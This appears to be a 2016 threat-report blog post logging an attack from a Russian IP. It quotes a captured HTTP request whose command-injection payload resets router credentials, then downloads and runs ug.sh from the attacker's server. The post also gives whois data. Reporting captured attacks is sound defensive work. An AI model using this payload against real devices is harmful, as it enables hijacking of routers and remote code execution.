Sonntag, 7. Februar 2016

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

 END OF DATA

The ug.sh tries to download an binary file





 Just by taking a look of the xxd and strings output of the file, it looks like an DD-WRT firmware file.


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer:This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois